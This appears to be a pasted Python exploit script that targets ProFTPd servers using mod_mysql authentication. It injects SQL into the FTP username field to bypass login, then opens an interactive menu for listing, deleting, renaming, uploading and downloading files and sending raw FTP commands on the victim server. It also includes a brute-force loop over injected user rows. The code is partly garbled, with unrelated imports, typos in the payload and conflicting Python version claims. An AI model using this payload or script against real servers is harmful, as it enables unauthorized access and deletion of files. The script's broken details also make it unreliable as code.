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Jun 8th, 2017
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  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  4. ## --------------------------------------------------------------------
  5. ## ProFTPd with mod_mysql Authentication Bypass Exploit [PYTHON]
  6. ## Code By NqrK
  7. ## Powered By Python 2.6
  8. ##
  9. ##
  10. ## --------------------------------------------------------------------
  11. ## Class : Input Validation Error
  12. ## Remote: Yes
  13. ## Credit:
  14. ## Page :
  15. ##
  16. ##
  17. ##
  18. ## --------------------------------------------------------------------
  19. ##
  20. ## to sufficiently sanitize user-supplied data before using it in an SQL query.
  21. ##
  22. ## modify data, or exploit latent vulnerabilities in the underlying database.
  23. ## This may result in unauthorized access and a compromise of the application,
  24. ## other attacks are also possible.
  25. ## --------------------------------------------------------------------
  29. import os
  30. import sys
  31. import ftplib
  32. from ftplib import FTP
  33. from Xlib.protocol.structs import Host
  34. from __builtin__ import raw_input
  35. from twisted.protocols import ftp
  37. try:
  38. os.system('color 0a')
  39. os.system('title ProFTPd with mod_mysql Authetication Bypass Exploit')
  41. except:
  42. print("[!]You are in Unix, Change of exploit... [ok].")
  43. print("[+]Run modules Unix_Kernel..[RUN].\n")
  46. def Core():
  47. """
  49. """
  50. print("\n\t[!]Please Choose a Command To Execut On ", Host, "\n")
  51. print("[1] Show Files.")
  52. print("[2] Delete Files.")
  53. print("[3] Rename Files or Dir")
  54. print("[4] Create Directory")
  55. print("[5] Personnal Command")
  56. print("[6] Download Files")
  57. print("[7] Upload Files")
  58. print("[8] Change Directory")
  59. print("[9] Clear Console")
  60. print("[0] Show Menu")
  61. print("[E] Exit\n")
  63. while (1):
  64. cmd = raw_input("root@cmd ~ #")
  65. if cmd == "1":
  66. print("[!]Listing File On Server : ", Host, "...\n")
  67. try:
  68. ftp.retrlines('LIST')
  69. print("[+]Listing File On", Host, "is SuccessFul !\n")
  71. except:
  72. print("[!] Cannot Listing File On", Host, "\n\a")
  73. elif cmd == "2":
  74. print("[!] Please Specify a File To Delete\n")
  75. try:
  76. File = raw_input("Remove File : ")
  77. ftp.delete(File)
  78. print("[+]File {", File, "} Deleted ! \n")
  79. except:
  80. print("[!] Cannot Deleting File On", Host, "\n\a")
  81. elif cmd == "3":
  82. print("[!] Please Speecify a File To Rename\n")
  83. try:
  84. File = raw_input("Rename File : ")
  85. Rename = raw_input("New Name : ")
  86. ftp.rename(File, Rename)
  87. print("[+]File {", File, "} Renamed to {", Rename, "} \n")
  88. except:
  89. print("[!] Cannot Renamed File On", Host, "\n\a")
  90. elif cmd == "4":
  91. print("[!] Please Specify a Directory Name To create\n")
  92. try:
  93. DIR = raw_input("New Directory : ")
  94. ftp.mkd(DIR)
  95. print("[+]Create a New Directory !\n")
  96. except:
  97. print("[!] Cannot Created DIR On", Host, "\n\a")
  98. elif cmd == "5":
  99. print("[!] Please Enter you Command :")
  100. print("[!] Enter ''/close'' for Exit Option\n")
  101. while (1):
  102. perso_cmd = raw_input("root@server ~ # ")
  103. if perso_cmd == "/close":
  104. break
  105. else:
  106. try:
  107. request = ftp.sendcmd(perso_cmd)
  108. print(request)
  109. except:
  110. print("[!]Command not Found On ", Host, "\n\a")
  111. elif cmd == "6":
  112. print("[!] Please Specify a Files Name To Download\n")
  113. Rem_Files = raw_input("Download Files : ")
  114. try:
  115. ftp.sendcmd('GET '+ Rem_Files)
  116. print("[+]File {", Rem_Files, "} Downloaded !\n")
  117. except:
  118. print("[!] Cannot Download Files On ", Host, "\n\a")
  119. elif cmd == "7":
  120. print("[!] Please Specify a Files Name To Upload\n")
  121. try:
  122. File = raw_input("Files : ")
  123. upl = open(File, 'rb')
  124. ftp.storbinary('STOR '+File, upl)
  125. upl.close()
  126. print("[+]File {", File,"} Uploaded !\n")
  127. except:
  128. print("[!] Cannot Upload Files On ", Host, "\n\a")
  129. elif cmd == "8":
  130. print("[!] Please Specify a Directory Name To Changed\n")
  131. try:
  132. Dir = raw_input("Directory : ")
  133. ftp.sendcmd('CWD '+ Dir)
  134. print("[+]Directory : ", Dir, "\n")
  135. except:
  136. print("[!] Cannot Changed Directory On ", Host, "\n\a")
  137. elif cmd == "9":
  138. try:
  139. os.system('cls')
  140. except:
  141. os.system('clear')
  142. elif cmd == "0":
  143. print("\n\t[!]Please Choose a Chommand To Execut On ", Host, "\n")
  144. print("[1] Show Files.")
  145. print("[2] Delete Files.")
  146. print("[3] Rename Files or Dir")
  147. print("[4] Create Files or Dir")
  148. print("[5] Personnal Command")
  149. print("[6] Download Files")
  150. print("[7] Upload Files")
  151. print("[8] Change Directory")
  152. print("[9] Clear Console")
  153. print("[0] Show Menu")
  154. print("[E] Exit\n")
  156. elif cmd == "E":
  157. ftp.quit()
  158. print("[!]Disconnection.....[ok].\a")
  159. print("[+]Unloading exploit....[ok].\a")
  160. print("Exit...[OUT].\a\n")
  162. raw_input("Press ENTER To Continue...")
  165. break
  167. def Brute():
  168. print("\n\t=================================================")
  169. print("\t [+] Attempting User Directory Discover Via FTP")
  170. print("\t=================================================\n")
  171. go = raw_input("[*] Target Online : ")
  172. print("\n")
  173. def brute():
  174. for i in range(0, 31):
  175. try:
  176. username = "%') and 1 = 2 union select 1, 1uid, gid, homedir, shell from ftpuser LINIT "+str(i) +",1; --"
  177. password = str("1")
  178. ftp = FTP(go)
  179. ftp.login(username, password)
  180. print("\n\a\t[+] Logged in as user "+ str(i) +",1")
  181. ftp.retrlines('LIST')
  182. ftp.close()
  183. except:
  184. print("[!] Invalid USER ["+str(i)+"] number On ", go, "....Auto-Restart BruteForcer.")
  186. brute()
  187. print("\n[$] Brute-Force Finished..\n")
  188. raw_input()
  189. print("")
  190. print("\t=========================================================")
  191. print("\t[+] ProFTPd with mod_mysql Authentication Bypass Exploit")
  192. print("\t[+] Credits Go For NqrK For Finding The Bug !")
  193. print("\t [+]Exploited By NqrK")
  194. print("\t [+]")
  195. print("\t=========================================================\n\a")
  196. user = "%') and 1=2 union select 1, 1uid, gid, homedir, shell from ftpuser, --"
  197. passwd = "1"
  198. Host = raw_input(" [*]Target: ")
  199. print("\n\a [!] Attacking ", Host, "...\n")
  200. try:
  201. print("[+]Conneect to host [waiting please]...\n\a")
  202. ftp = FTP(Host)
  203. print("[+]Connected to ", Host, "\n\a")
  204. try:
  205. print("[+]loading exploit...Attacking..[Waiting Please]. \n")
  206. ftp.login(user, passwd)
  207. try:
  208. print("[+]Attacking succeessful !\n\a")
  209. print("[+]Exploit PWNED The Machine : ", Host, " Enter in Matrix...\a\n")
  210. Core()
  211. sys.exit()
  212. except:
  213. print("[!]END ProFTPd with mod_mysql Authentication Bypass Exploit in Python 3.5 By NqrK\n\a")
  214. except:
  215. print("[!] Couldn't ByPass The authentication !\a\n")
  216. print("\n[+] Attempting User Directory Discover Via FTP [+]\n ")
  217. choice = raw_input("(yes)/(no): ")
  218. if choice == "yes":
  219. Brute()
  220. else:
  221. pass
  225. except:
  228. print("[!] Cannot connect to ", Host, "\n\a")
  229. raw_input()
  231. ##END
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